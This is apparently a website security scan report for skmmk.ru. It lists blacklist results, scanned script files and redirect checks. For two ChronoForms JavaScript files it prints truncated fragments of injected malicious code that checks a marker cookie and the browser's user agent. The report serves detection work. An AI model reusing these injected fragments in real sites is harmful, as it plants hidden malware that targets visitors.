Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skmmk.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://skmmk.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.skmmk.ru/ | 200 OK Content-Length: 29120 Content-Type: text/html | clean |
http://www.skmmk.ru/templates/jblank/js/jquery.js | 200 OK Content-Length: 78673 Content-Type: application/javascript | clean |
http://www.skmmk.ru/templates/jblank/js/jquery.colorbox.js | 200 OK Content-Length: 26084 Content-Type: application/javascript | clean |
http://www.skmmk.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94273 Content-Type: application/javascript | clean |
http://www.skmmk.ru/cache/widgetkit/widgetkit-d98504d1.js | 200 OK Content-Length: 17848 Content-Type: application/javascript | clean |
http://www.skmmk.ru/templates/jblank/js/jquery.core.1.6.2.min.js?1409916350 | 200 OK Content-Length: 91628 Content-Type: application/javascript | clean |
http://www.skmmk.ru/templates/jblank/js/jquery.tools.js?1409916275 | 200 OK Content-Length: 4273 Content-Type: application/javascript | clean |
http://www.skmmk.ru/templates/jblank/js/_application.js?1409916424 | 200 OK Content-Length: 773 Content-Type: application/javascript | clean |
http://www.skmmk.ru/plugins/content/arisexylightboxlite/arisexylightboxlite/js/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: application/javascript | clean |
http://www.skmmk.ru/plugins/content/arisexylightboxlite/arisexylightboxlite/js/jquery.easing.js | 200 OK Content-Length: 3380 Content-Type: application/javascript | clean |
http://www.skmmk.ru/plugins/content/arisexylightboxlite/arisexylightboxlite/js/jquery.sexylightbox.min.js | 200 OK Content-Length: 10620 Content-Type: application/javascript | clean |
http://www.skmmk.ru/media/system/js/core.js | 200 OK Content-Length: 4271 Content-Type: application/javascript | clean |
http://www.skmmk.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 72 Content-Type: application/javascript | clean |
http://www.skmmk.ru/components/com_chronoforms/js/formcheck/formcheck-yui.js | 200 OK Content-Length: 20206 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u Antivirus reports:
| ||
http://www.skmmk.ru/components/com_chronoforms/js/formcheck/formcheck-max.js | 200 OK Content-Length: 4461 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u if (obj.element && obj.element.getStyle('opacity').toInt() == 0) { obj.element.destroy(); obj.element = false; } }.bind(this) }); if(obj.element.getStyle('opacity').toInt() != 1) obj.fx.start('opacity', 1); } } if (this.options.display.addClassErrorToField && !obj.isChild){ obj.addClass(this.options.fieldErrorClass); obj.element = obj.element || true; } } }); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skmmk.ru
Result:
GET / HTTP/1.1
Host: skmmk.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: skmmk.ru
Referer: http://www.google.com/search?q=skmmk.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skmmk.ru
Referer: http://www.google.com/search?q=skmmk.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.